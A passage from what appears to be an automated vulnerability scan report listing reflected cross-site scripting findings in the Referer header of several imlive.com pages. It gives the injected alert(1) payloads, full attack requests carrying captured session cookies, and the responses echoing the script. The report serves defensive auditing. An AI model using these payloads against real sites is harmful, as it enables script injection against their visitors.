Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 13435
Vary: Accept-Encoding


<html>
<head>
<title>Celebrity Porn Star Sign Up at ImLive</title>
<meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L
...[SNIP]...
img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.193. http://imlive.com/become_host.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /become_host.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=f6689'-alert(1)-'b778a8b9f7a&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.194. http://imlive.com/becomehost.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /becomehost.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:01 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=98226'-alert(1)-'ff8df7e9357&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.195. http://imlive.com/categoryfs.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8327
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=b27c2'><script>alert(1)</script>5c3f838203&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.196. http://imlive.com/categoryfs.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:01 GMT
Connection: close
Content-Length: 19002
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.197. http://imlive.com/categoryms.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:02 GMT
Connection: close
Content-Length: 21894
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.198. http://imlive.com/categoryms.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8328
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=69bb4'><script>alert(1)</script>8751657e5a8&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.199. http://imlive.com/customerservice.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /customerservice.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /customerservice.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:15 GMT
Connection: close
Content-Length: 14451
Vary: Accept-Encoding


<HTML>
   <HEAD>
       <title>Customer Service - Live Video Chat at ImLive</title>
       <meta name="description" content="You are very important to us, and we strive to provide you with world class custom
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.200. http://imlive.com/disclaimer.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:51 GMT
Connection: close
Content-Length: 78924
Vary: Accept-Encoding


<html>
